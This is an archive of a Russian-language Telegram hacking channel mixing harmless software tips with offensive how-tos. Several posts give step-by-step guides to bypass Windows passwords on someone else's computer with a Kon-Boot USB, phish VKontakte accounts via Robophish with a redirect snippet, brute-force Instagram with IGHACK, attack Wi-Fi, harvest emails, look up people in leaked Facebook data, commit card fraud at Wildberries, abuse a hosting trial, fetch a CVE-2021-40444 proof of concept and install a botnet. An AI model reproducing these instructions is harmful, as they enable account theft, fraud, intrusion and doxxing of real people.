Утечки 0-day
Closed channel
🆘0-day l Zero Day 🪩Exploit l Code Database 🕸️Ethical Hacking l Penetration Testing ▪︎ Group: @darkodays ▪︎ Теневое приват сообщество: https://t.me/+W1xCuslFk3liMjli ▪︎ Chat: https://t.me/+ikofZIcwJ002ZjMy В ознокомительных целях.
Show more289
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
289
Простейший способ обхода пароля в Windows
Ситуации бывают разные: забытый пароль, срочно нужен доступ к чужому компьютеру, ищем компромат на обидчика. Речь о хакинге? Нет! Наш метод даже близко рядом с ним не стоит. Как минимум по уровню сложности исполнения. Ставим софт на флешку → вставляем USB-носитель в нужную машину → получаем доступ.
1. Вставляем флешку в свой комьютер.
└ Дальнейшие действия сотрут все данные с USB-носителя.
2. Запускаем 𝗞𝗼𝗻𝗕𝗼𝗼𝘁 от имени администратора.
└ Выйдет окно со списком возможностей программы.
3. Выбираем флешку в разделе «Available USB drivers».
4. Нажимаем «Install to USB stick (with EFI support)».
└ Подготовка закончена — флешка готова к использованию.
5. Вставляем USB-носитель в целевой компьютер.
6. Во время загрузки системы заходим в BIOS.
7. Выставляем загрузку с флешки в приоритет. (см. скрин)
└ Другой путь: при запуске системы постоянно нажимаем F8, дальше — стрелочками выбираем флешку и нажимаем Enter.
8. В окне загрузчика выбираем 1-ый пункт (см. скрин)
#windows
289
Recuva — бесплатный софт от известного CCleaner для восстановления случайно удалённых файлов.
Можно восстановить данные даже с поврежденных и отформатированных дисков, но шансы существенно ниже. Есть несколько важных действий, которые нужно предпринять после удаления файла и очистки корзины.
▪︎ Закройте все программы, записывающие данные на диск (например, BitTorrent);
▪︎ Не сохраняйте никакие данные на диск после удаления важного файла (не перезаписывайте);
▪︎ Не устанавливайте Recuva на тот же диск, откуда вы удалили ваш файл
#софт #soft
289
Whoami — комплексный инструмент сохранения анонимности в Linux системах.
▪︎ Анти MiTM (человек-по-середине);
▪︎ Убийца логов;
▪︎ Меняет IP/DNS/MAC;
▪︎ Меняет часовый пояс и имя хоста.
#софт #Linux #анонимность
289
Tinfoil Chat — еще один безопасный мессенджер для настоящих параноиков. Открытый исходный код.
FOSS+FHD мессенджер, который использует аппаратную архитектуру высокой надежности для защиты пользователей от пассивного сбора данных, атак MITM и, что наиболее важно, удаленной фильтрации ключей.
Все сообщения идут через Tor, в частности Tor сервисы нового поколения (V3). Разумеется, никакой регистрации не требуется.
#мессенджер #darkoday #анонимность
289
Ghostpress — анти-кейлоггер, работающий в фоновом режиме.
Удобная софтина для обнаружения и удаления кейлоггеров, хотя сложно представить, что нужно делать современному пользователю, что бы рандомно поймать его в интернете, а не стать жертвой целенаправленной атаки.
Есть платная и бесплатная версии.
#софт #сниффер #security #darkoday #soft
289
Бесплатно получаем мощный хостинг на месяц от «Timeweb» (26.09.21)
Перед вами способ получение достаточно хорошего хостинга для личных нужд.
1. Переходим по ссылке и регистрируемся;
2. Выбираем любой тариф и бесплатно получаем 10-ти дневный пробный период;
3. По истечению пробного периода вносим 1₽ на баланс;
4. В личном кабинете у нас появляется кнопка "Продлить Хостинги" и "Отложить платеж", выбираем "Отложить платеж" и получаем еще 1-2 недели для теста;
5. Абузим сервис с помощью мультиаккаунтов;
6. PROFIT!
#hosting #хостинг
289
iSH — «карманный» Linux на iOS.
Когда-нибудь хотели, чтобы у вас была командная строка Linux на iPad или iPhone? С iSH вы можете довольно близко подойти к этой цели. iSH Shell - это оболочка Linux для iOS, которая использует эмулятор x86 для запуска упрощенной версии Alpine Linux на iPad или iPhone.
Установка:
Простой способ установить iSH - через TestFlight, но вы также можете загрузить приложение сбоку *, если предпочитаете этот маршрут:
1️⃣ С iPad или iPhone установите TestFlight из App Store.
2️⃣ На iPad или iPhone нажмите следующую ссылку:
https://testflight.apple.com/join/97i7KM8O
3️⃣ Выберите начало тестирования и примите условия TestFlight.
4️⃣ Нажмите «Установить» в TestFlight, это установит приложение iSH Shell в iOS.
iSH установится на ваш iPhone или iPad, как и любое другое приложение, и вы можете открывать и закрывать его, как любое другое приложение для iOS.
#ish #ios #linux #darkoday #лайфхак
289
Взламываем Wi-Fi через Termux
Wifipumpkin3 — софт для проведения атак на Wi-Fi точки доступа. Может провозить атаки MiTM & Rogue, Имеет в себе сканер Wi-Fi сетей, сервис мониторинга DNS. Открытый исходный код.
#wifi #attack #darkoday #soft
289
Получаем SMS-сообщения на компьютер
Раньше мы отправляли SMS’ки девочкам с соседнего двора, а сегодня это чисто технический момент. Подтвердить регистрацию на сайте или перевод в платежной системе.. дальше дело обычно не заходит. Но даже при таком раскладе систему лучше наладить так, чтобы было максимально удобно! Да и кто знает, что может случиться: телефоны крадут, телефоны теряются. Всегда оставаться хозяином положения — вот слоган современных технологий!
«Messages» от Google — приложение, которое синхронизирует СМС и ММС с веб-версией в браузере. Короче, можно читать и отправлять сообщения через Android, но на компе! Давай пошагово: открываем «Messages» → нажимаем на «...» в правом верхнем углу → выбираем «Подключить устройство» → переходим в веб-версию → нажимаем «Запомнить это устройство» → сканируем QR-код. Done!
#лайфхак
289
Собираем электронные почты с вебсайтов.
Email Grabber — утилита для сбора email с произвольного списка веб-сайтов.
Установка:
git clone https://github.com/KTN1990/Email-Grabber
cd Email-Grabber
Использование:
python3 emailgrabberv2.py -h
#grabber #email289
Фишинг «Вконтакте» в Termux
Robophish — лучшая утилита для фишинга Вк.
Установка:
git clone https://github.com/gasayminajj/robophish
cd robophish
Переходим в HTML редатор и добавляем туда скрипт редиректа на наш сайт.
<head>
<meta http-equiv="refresh" content="1;URL=darknets.ru" />
</head>
Запуск:
bash robophish.sh
#фишинг #vk289
[Михаил Русаков] Написание лайфхаков на Python (2021)
Вы получаете, скачая курс «Написание лайфхаков на Python»:
▪︎ 20 отличных примеров из самых разных областей;
▪︎Подробный видеоразбор, написание и тестирование каждого примера;
▪︎ Навык, который позволит Вам сэкономить на протяжении жизни тысячи и тысячи часов, которые Вы сможете потратить на себя;
▪︎ Знания, которая позволят Вам избежать выполнения рутинных, скучных задач, поручив их компьютеру, который сделает всё за Вас в миллионы раз быстрее и при этом безошибочно;
▪︎ Дополнительный опыт в программировании, который поможет при трудоустройстве Python-разработчиком;
▪︎Бонус, который научит Вас находить любые ошибки в своём (и даже чужом, например, скопированном из Интернета) коде;
▪︎ Все исходники из курса.
⚙ Download
#курс #python #лайфхак
289
Cybersecurity. Ambient Technologies, IoT, and Industry 4.0 Implications.
Дата выхода: Август 2021 года.
Цена в онлайн магазине: 41$ / 3034₽.
Table of Contents:
1.General and Specific Security Services, Risks and its Modeling
2.Vulnerability and Attack Detection Techniques: Intrusion Detection System
3.Digital Right Management in Computing Environment
4.Tradeoffs and Vulnerabilities in IoT & Cloud Secure Computing
5.Location and Availability Protections in Smart Mobility
6.Digital Forensics Cryptography with Smart Intelligence
7.Transmission Modelling on Malware Attack through Internet of Things
8.Rice plant disease detection using IoT
9.Secure Protocols for Biomedical Smart Devices
10.Access Control Mechanism in Healthcare Information System
11.Privacy Preservation tools and Techniques in Artificial Intelligence
12.Web Security Vulnerabilities: Identification, Exploitation and Mitigation
💰 Продажник
#security #darkoday #книга
289
Ломаем инсту со смартфона
Сегодня мы будем взламывать инстаграм посредством использования Termux. Инструмент который мы будем использовать основан на переборе паролей и называется IGHACK.
Приступим:
▪︎ Первым делом обновляем все пакеты и устанавливаем наш инструмент:
apt update
apt upgrade
install python -y
install python2 -y
install git -y
git clone https://github.com/noob-hackers/ighack
cd ighack
bash setup
▪︎ Для запуска используем следующую команду:
bash ighack.sh
▪︎ У нас откроется менюшка, где на выбор нам представят несколько функций:
auto attack - автоматическая брутфорс атака, с паролями по умолчанию
manual attack - брутфорс атака вручную, с вашим листом паролей
about - описание утилиты
update - обновление (рекомендую выбрать перед запуском)
exit - выход из инструмента
#brute #attack #darkoday #bruteforce #instagram289
Открываем приложение на Android, не устанавливая его!
Для тех, кто не хочет терять ни секунды: с помощью режима "Мгновенный запуск" вы можете открыть приложение из PlayMarket без установки!
Инструкция:
1. Заходим в "Настройки" смартфона, листаем до раздела "Google" и открываем его.
2. Выбираем подраздел "Настройки для приложений Google".
3. Переходим в пункт "Google Play Instant" или "С мгновенным запуском" и нажимаем на переключатель напротив "Обновить веб-ссылки".
4. Открываем Play Market и находим приложение с поддержкой быстрого запуска, например, Vimeo. При переходе на страницу приложения видим кнопку "Попробовать" — нажимаем на неё, готово.
Предупреждаем: не все приложения поддерживают технологию "Instant App", поэтому некоторые приложения всё-таки придётся скачивать.
#лайфхак #android #darkoday
289
Пробив по Facebook
В данном посте мы узнаем как можно пробить человека в БД facebook на onion сайте.
FuckFacebook — ресурс для поиска в утечках Facebook почти всех стран, 435 млн строк. Находит: Facebook ID, номер телефона, имя и фамилию, работу, страну, статус и адрес.
#osint #пробив #darkoday #facebook
289
Вбив «Wildberries» (22.09.21)
Название схемы говорит само за себя.
1. Скачиваем приложение «Wildberries» v. 4.0.6000 (4pda);
2. Греем/покупаем аккаунт с заказами (важно что бы заказы были сделаны с android'а)
3. Отключаем интернет, открываем приложение и выбираем свою страну
4. Далее появится окно "проверьте подключение к интернету", после чего включаем интернет и нажимаем "обновить";
5. Набираем корзину и вбиваем, далее наступает развилочка;
└ Если на карте есть деньги, то оплата пройдёт и она привяжется к аккаунту;
└ Если карта невалидная или пустая, то вылезет белый экран с надписью "state 0";
└ Если вылез 3ds, то меняем аккаунт;
6. PROFIT!
Тема строго в ознакомительных целях, не испытывайте судьбу
#вбив #схема
289
1Password — наведи уже порядок с паролями!
Хранить пароли в блокноте, ворде, мессенджере — дурная идея. Хуже только использовать везде один и тот же. Поэтому лучшая инвестиция в вашу спокойную цифровую жизнь — разобраться с паролями. Надо только один раз запариться, дальше все будет работать как надо.
1Password — он один из лучших на рынке, еще есть KeePass, Dashlane, Keeper и ряд других. Заметьте: все они платные. Я не верю в бесплатный менеджер паролей. Если вы пользуетесь чем-то бесплатно — значит продукт это вы и ваши данные. Поэтому только платные.
Что умеет 1Password:
• доступны все основные ОС и браузеры;
• неограниченное количество паролей и 1ГБ для документов;
• защита с двухфакторкой и сквозным шифрованием;
• функция Travel Mode автоматически удаляет конфиденциальную информацию, которую потом легко восстановить.
Приложение на iOS и Android, десктоп на Windows, macOS и Linux, расширение для Chrome.
#безопасность
289
Очень опасная CVE-2021-40444. Патча нет. MHTML ActiveX под Win10. PoC
https://raw.githubusercontent.com/Udyz/CVE-2021-40444-Sample/main/poc.html
289
BOTNET Для Linux [Debian/Kali/Windows/Termux]
Установка:
▪︎Открываем терминал, и устанавливаем Python и также Git:
apt install python3 git
▪︎Переходим в директерию с юзерботом:
cd bnt
▪︎Устанавливаем зависимости:
pip3 install -r requirements.txt
▪︎И запускаем файл через Python:
python3 bot.py
▪︎Запускаем терминал и пишем такие комманды:
cd bnt && python3 bot.py
#botnet #darkoday